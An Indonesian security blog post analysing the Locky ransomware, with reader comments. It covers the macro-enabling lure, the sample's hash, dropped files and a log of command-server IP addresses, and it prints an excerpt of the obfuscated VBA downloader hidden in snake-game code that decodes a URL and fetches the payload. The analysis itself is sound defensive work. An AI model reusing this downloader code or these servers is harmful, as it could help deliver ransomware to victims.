Ransomware Locky – Virus dengan Tujuan Pemerasan

Posted in internet, Virus Asing on Mar 14, 2016

Sesuai dengan namanya, Ransom(ware), virus yang satu ini meminta tebusan kepada korban agar data korban bisa dikembalikan dari ulah virus ini, mengenkripsi data korban, anggap saja file korban dikunci oleh virus, Lock[y].

 

Pemberitahuan adanya kode Marco

 

 

Karakteristik Virus

Menurut data dari VirusTotal.Com, 46 dari 57 antivirus yang tergabung dalam VirusTotal mendeteksi file ini (induk virus Locky) sebagai virus: https://www.virustotal.com/en/file/4da4801c5ae6e801b978c430fb733e28443e98510af818246f34101f5686556c/analysis/

SHA: 4da4801c5ae6e801b978c430fb733e28443e98510af818246f34101f5686556c

CRC32: 94BB169F

Ukuran: 287 KB (293,888 bytes)

Company: Crintsoft

Description: Spectrographs Windows Have

Versi: 3.3.7.9

Original Filename: DiplomaVariableepershand

Locky Properties

Bentuk File Virus

Tidak seperti virus umumnya, yang bertipe data ‘executable (.exe)’, virus Ransomware Locky ini memanfaatkan Macro dari VBA yang disediakan oleh Microsoft Office. Dapat disimpulkan bahwa virus ini bukan virus yang berdiri sendiri (.exe), melainkan kode [Macro] yang menempel pada file dokumen, bisa itu dokumen dari Ms. Word (.doc), bisa pula dari Ms. Excel (.xls)

Pemberitahuan adanya kode Marco

Pada gambar di atas, terlihat bahwa file dokumen tersebut memiliki kode perintah yang berasal dari VBA Macro.

Dengan sedikit pendekatan sosial (Social engineering is the art of manipulating people so they give up confidential information), maka bisa saja si pembuat virus menuliskan teks yang tidak terbaca, dan meminta user atau calon korban untuk mengaktifkan fungsi Macro agar bisa membaca file yang tidak terbaca tadi.

Mungkin Anda sempat penasaran, “Apa virus ini mengenkripsi isi tulisan yang ada di dalam dokumen saja, tanpa merubah keseluruhan struktur file?”

Tentu tidak mau susah-susah juga si pembuat virus untuk membuat fungsi membaca isi dokumen lalu mengenkrip isi dokumennya saja. Maka Locky haruslah mengenkripsi seluruh struktur data dan membuat format struktur data dari file dokumen Ms. Word atau file lainnya menjadi tak berbentuk lagi, yakni terenkripsi mode EOF, bukan MOF (Middle Of File).

Mungkin Anda sempat penasaran juga, “Kok bisa script VBA Macro memiliki dampak sedahsyat Ransomware Locky ini, yang kata sebagian banyak situs website security mengatakan virus Ransomware Locky ini tergolong virus yang sangat berbahaya, mengenkripsi setiap tipe data yang telah ditentukan oleh virus, dan menyebar melalui EMail, dan untuk membukanya kembali haruslah bayar sekian BitCoin ke si pembuat virus, belum ada Antivirus yang bisa mendekripnya, meskipun ada induk virus sudah berhasil dilumpuhkan oleh Antivirus?”

Pembuat virus Ransomware Locky ini tergolong lihai dalam pemrograman Desktop maupun Web, maka, source code yang ada dari VBA Macro file Ms. Word hanyalah sebatas perintah untuk mendownload file induk executable yang sudah standby di server untuk didownload. Perintah mendownload induk virus ini terbagi menjadi dua:

1. Mendownload induk virus langsung melalui fungsi VBA

2. Melalui VBA membuat file .vbs atau .bat yang berisi perintah untuk mendownload induk virus.

Jika Anda sudah terlanjur mengaktifkan Macro seperti gambar di atas dan Anda klik OK, ada 3 kemungkinan:

1. Jika komputer terkoneksi ke internet dan server virus masih online dan berfungsi dengan baik, maka komputer Anda kemungkinan akan ditanam induk virus Ransom Locky.

2 Jika komputer terkoneksi ke internet dan server virus sudah tidak online lagi, maka komputer Anda masih aman. Proses penanaman induk Locky ke komputer Anda tidak berhasil.

3. Jika komputer tidak terkoneksi ke internet, maka Anda bisa bernfas lega, karena Locky tidak berhasil menanamkan induknya ke komputer Anda, maka akan muncul pesan seperti gambar di bawah.

Ternyata berat juga perjuangan virus Locky menyebar agar bisa mendapat mangsa. Belum lagi ancaman Antivirus yang semakin memperbarui database dan ancaman bahwa situs server induknya Loacky terancam kena Blacklist (daftar hitam) dari berbagai media.

 

Perlu diketahui, bahwa tidak semua Macro adalah Locky atau berisi perintah virus. Dalam contoh kasus nyata, para Programmer yang menekuni basis data, ada juga yang menggunakan Macro untuk mempermudah pekerjaannya. Misal mengkomunikasikan data yang ada pada server; PHP; SQL, untuk dimuat rekap perhitungan datanya ke Ms. Excel.

Aksi Virus

Saat induk virus berhasil didownload dan dijalankan, maka induk virus bersarang di:

  • C:\Documents and Settings\Admin\Local Settings\Temp\eiasus.exe
  • Si eiasus.exe membuat file, mengcopykan diri: C:\Documents and Settings\Admin\Local Settings\Temp\svchost.exe
  • Si svchost.exe (palsu, punya Locky) membuat file, mengcopykan diri: C:\Documents and Settings\Admin\Local Settings\Temp\sysE.tmp

Hingga selesai menulis artikel ini, sayangnya sample Locky yang sudah berjalan di komputer penulis tidak melakukan aksi enkripsi data, sehingga penulis tidak dapat melaporkannya ke dalam artikel ini. Adapun jika tentang tebusan yang dipinta oleh virus ini, yang ditampilkan melalui gambar atau tulisan, sebaiknya untuk tidak melakukan pembayaran atau tebusan tersebut, pokoknya jangan!

Karena, belum tentu si pembuat virus benar-benar mau memberikan program pendekripnya. Dan lagi, jika membayar atas kejahatannya, ditakutkan nantinya hanya akan membuatnya menjadi lebih giat membuat aksi serupa.

Kita tunggu saja perang kriptograpi ini hingga menemukan lawan yang seimbang. Si peng-enkrip dan si pen-dekrip. Atau ikhlaskan saja file yang sudah terlanjur di-enkrip virus, anggap saja musibah selayaknya terformatnya harddisk atau flashdisk, dan kita harus bersabar menghadapinya, tentu harus menjadi lebih hati-hati.

Server-server Locky

Dalam interval tertentu, Locky selalu mencoba mengakses servernya. Berikut daftar aktifitas dan IP servernya:

3/14/2016 19:32:51

Target: TCP [Local host : 1062] -> [195.22.28.196 : 80 (http)]
3/14/2016 19:32:59

Target: TCP [Local host : 1063] -> [195.22.28.222 : 80 (http)]
3/14/2016 19:33:06

Target: TCP [Local host : 1064] -> [195.22.28.198 : 80 (http)]
3/14/2016 19:33:09

Target: TCP [Local host : 1065] -> [208.100.26.234 : 80 (http)]
3/14/2016 19:33:39

Target: TCP [Local host : 1066] -> [195.154.241.208 : 80 (http)]
3/14/2016 19:34:01

Target: TCP [Local host : 1067] -> [46.4.239.76 : 80 (http)]
3/14/2016 19:34:26

Target: TCP [Local host : 1068] -> [195.22.28.196 : 80 (http)]
3/14/2016 19:34:44

Target: TCP [Local host : 1069] -> [195.22.28.222 : 80 (http)]
3/14/2016 19:34:50

Target: TCP [Local host : 1070] -> [195.22.28.198 : 80 (http)]
3/14/2016 19:34:53

Target: TCP [Local host : 1071] -> [208.100.26.234 : 80 (http)]
3/14/2016 19:35:05

Target: TCP [Local host : 1072] -> [195.154.241.208 : 80 (http)]
3/14/2016 19:35:32

Target: TCP [Local host : 1073] -> [46.4.239.76 : 80 (http)]
3/14/2016 19:36:09

Target: TCP [Local host : 1074] -> [195.22.28.196 : 80 (http)]
3/14/2016 19:36:19

Target: TCP [Local host : 1075] -> [195.22.28.222 : 80 (http)]
3/14/2016 19:36:27

Target: TCP [Local host : 1076] -> [195.22.28.198 : 80 (http)]
3/14/2016 19:36:34

Target: TCP [Local host : 1077] -> [208.100.26.234 : 80 (http)]
3/14/2016 19:36:49

Target: TCP [Local host : 1078] -> [195.154.241.208 : 80 (http)]
3/14/2016 19:37:11

Target: TCP [Local host : 1079] -> [46.4.239.76 : 80 (http)]
3/14/2016 19:37:35

Target: TCP [Local host : 1080] -> [195.22.28.196 : 80 (http)]
3/14/2016 19:37:40

Target: TCP [Local host : 1081] -> [195.22.28.222 : 80 (http)]
3/14/2016 19:37:44

Target: TCP [Local host : 1082] -> [195.22.28.198 : 80 (http)]
3/14/2016 19:37:48

Target: TCP [Local host : 1083] -> [208.100.26.234 : 80 (http)]
3/14/2016 19:38:11

Target: TCP [Local host : 1084] -> [195.154.241.208 : 80 (http)]
3/14/2016 19:38:33

Target: TCP [Local host : 1085] -> [46.4.239.76 : 80 (http)]
3/14/2016 19:38:55

Target: TCP [Local host : 1086] -> [195.22.28.196 : 80 (http)]
3/14/2016 19:38:57

Target: TCP [Local host : 1087] -> [195.22.28.222 : 80 (http)]
3/14/2016 19:38:59

Target: TCP [Local host : 1088] -> [195.22.28.198 : 80 (http)]
3/14/2016 19:39:01

Target: TCP [Local host : 1089] -> [208.100.26.234 : 80 (http)]

Mengintip VBA Macro dari Virus Locky

VBA merupakan fitur yang sangat-sangat memberi nilai plus untuk sebuah aplikasi perkantoran dari paket Ms. Office. Tentu tidak semua aplikasi perkantoran menyediakan fitur VBA, bahkan hingga saat ini VBA belum tersedia pada Android.

ALT + F11 menjadi mantra sakti untuk memanggil jendela VBA.

Pada virus Locky ini, VBA yang tertulis di dalamnya berisi baris program dari game ular, sepertinya. Namun ada satu baris array dari salah satu fungsi di dalamnya berisi URL menuju server tempat dimana induk Locky berada.

Karena hanya mengintip, jadi, sedikit saja ya.

—-

Sub LoadLevel()
Tick = gameLevel.Tick
cellSize = gameLevel.cellSize
boardHeight = gameLevel.boardHeight
boardWidth = gameLevel.boardWidth
snake = gameLevel.snake
food.Matrix = gameLevel.food.Matrix
wallmatrix = gameLevel.wallmatrix
scorePoint = 0
End Sub

Private Function getTypeBodyCell(pX As Integer, pY As Integer, x As Integer, y As Integer, nX As Integer, nY As Integer) As String
Dim a As String
Dim b As String

If x = pX Then
If pY = y + 1 Then a = “top”
If pY = y – 1 Then a = “bottom”
End If
If y = pY Then
If pX = x + 1 Then a = “right”
If pX = x – 1 Then a = “left”
End If
Dim gorenebeda_7() As Variant
gorenebeda_7 = Array(104, 129, 142, 151, 110, 112, 125, 192, 212, 218, 229, 259, 270, 280, 227, 294, 305, 319, 342, 344, 366, 319, 400, 410, 359, 440, 459, 466, 480, 478, 499, 450, 524, 540, 545, 570, 515, 536, 548, 557, 571, 633, 650, 610, 674, 631, 699, 731, 725)
If x = nX Then
If nY = y + 1 Then b = “top”
If nY = y – 1 Then b = “bottom”
End If
If y = nY Then
If nX = x + 1 Then b = “right”
If nX = x – 1 Then b = “left”
End If

Dim gorenebeda_8 As Integer
Dim uncunctunc2_1 As String
uncunctunc2_1 = “”
GoTo s2
If (a = “top” And b = “right”) Or (a = “right” And b = “top”) Then
getTypeBodyCell = “tr”
End If
If (a = “bottom” And b = “right”) Or (a = “right” And b = “bottom”) Then
getTypeBodyCell = “br”
End If
If (a = “top” And b = “left”) Or (a = “left” And b = “top”) Then
getTypeBodyCell = “tl”
End If
If (a = “bottom” And b = “left”) Or (a = “left” And b = “bottom”) Then
getTypeBodyCell = “bl”
End If
s2:
For gorenebeda_8 = LBound(gorenebeda_7) To UBound(gorenebeda_7)
uncunctunc2_1 = uncunctunc2_1 & Chr(gorenebeda_7(gorenebeda_8) – 13 * gorenebeda_8)
Next gorenebeda_8
GoTo s7
If (a = “top” And b = “bottom”) Or (a = “bottom” And b = “top”) Then
getTypeBodyCell = “tb”
End If
If (a = “left” And b = “right”) Or (a = “right” And b = “left”) Then
getTypeBodyCell = “lr”
End If
s7:
gorenebeda_1.Open onopridet(5), uncunctunc2_1 & “?” + Trim(Str(Math.Rnd(100))), False
MimoNasM

End Function

—-

Membersihkan Induk Locky

Kalau hanya induknya saja, yang diperkirakan dibuat menggunakan C++, memang bisa dilumpuhkan dan dibersihkan dari komputer. Namun untuk akibat dari enkripsinya, file korban akan menjadi rusak, dan hanya si empunya virus Locky yang tau algoritma untuk mendekripnya ulang.

Tambahkan file induk Locky tersebut di atas sebagai virus, lalu biarkan Smadav melakukan pemindaian, dan Fix-lah menggunakan Smadav setelah proses pemindaian virus selesai.

 

19 Responses to “Ransomware Locky – Virus dengan Tujuan Pemerasan”


  1. Anonymous says:

    too , very fine

     
  2. Andi says:

    Saya pernah terserang virus semacam ini dan semua data office, jpg, video, pdf dan masih banyak ekstensi file yang lainnya yang di enskrip menjadi (misal file report240316.docx menjadi 51425-62721-82929.locky).
    Virus dikirim melalui email didalam attachment biasanya di kompres atau di Zip. Saya sudah sering menerima virus ini karena mengharuskan saya mempunyai web yang memakai email saya di page kontaknya, akan tetapi langsung saya delete, tapi waktu itu mungkin sedang naas pas kebetulan minta foto2 seminar dan ada kiriman dari seseorang yang saya pikir staff teman saya dengan judul Photos, file di zip, langsung saya download dan isinya JavaScript saya pikir program photo, akhirnya saya sadar tapi sudah 90% data terenskrip dimakan locky.
    Tapi masih beruntung karena sekitar sebulan atau 2 bulan sebelumnya saya sudah membackup data di ekternal Hard disk, jadi memang kerjaan yang dalam jangka waktu 1-2 bulan tersebut direlakan hangus dimakan locky.

    So backup data disetiap bulan atau 2-3 bulan sekali untuk menjaga file2 berharga kita, dan jangan pernah menerima attachment dari email tak dikenal dan tetap waspada.

    Demikian berbagi pengalaman saya.

     
  3. agung says:

    kalau laptop ku setiap flasdisk di colok pasti terdekteksi virus, sudah saya scan pakai smadav sudah oke, nah saya cabut saya colok lagi ketedek lagi itu virus. virus apa ya?

     
  4. george says:

    good

     
  5. conan says:

    mantap boss

     
  6. fahing47 says:

    wah wah.. brati ini biang keroknye,, udah lelah ngerjain tugas skol 68 halaman, ujung ujungnya kaga bisa dibuka.. hah,, untung windows ane di virtualbox, ( host ubuntu )

     
  7. arman says:

    komputerku kayaknya sudah kena virus locky, documenku semua tidak bisa terbuka setelah diinstal ulang,
    untuk virus ini apa sudah ada solusinya untuk file yang terinfeksi?

     
  8. Sofyan Hadi says:

    Terima kasih Info yang bermanfaat, harus hati hati ni 🙁

     
  9. jojo says:

    cara mengembalikan data yg sudah terkena virus locky bagaimana ada yg bisa bantu karena saya terkena serangan virus tersebut

     
    • arachmadi says:

      hampir mustahil merecover data dari hasil serangan enkripsi ransomware ini, mengingat metode yang digunakan berbeada-beda tiap ransomware dan sudah sangat dipastikan ini aman, seperti agan menyimpan file .RAR /.ZIP yang sudah di password

       
  10. abi says:

    sangat bagus, ya bagus sekali..
    kapan2 saya mampir kesini..

     


Leave a Reply


  • Search

    Loading
  • Wall

    Previous Next
    Latest on Mon, 12:16 am

    Mimose Desir: Je suis contente d'avoir cette nouvelle version

    Burlington coupons: Great product! Fast shipping! Thanks. Burlington coupons http://www.burlingtoncoatcoupons.com

    titus: good one

    titus: good

    ochitiga muzamil: perfect one

    djkaybee: good one

    okochi emmanuel: perfect service

    Asmawi: Ingin yang terbaik

    carolyn: very good

    mubarak rabiu: good experiance

    » Tuliskan komentar Anda :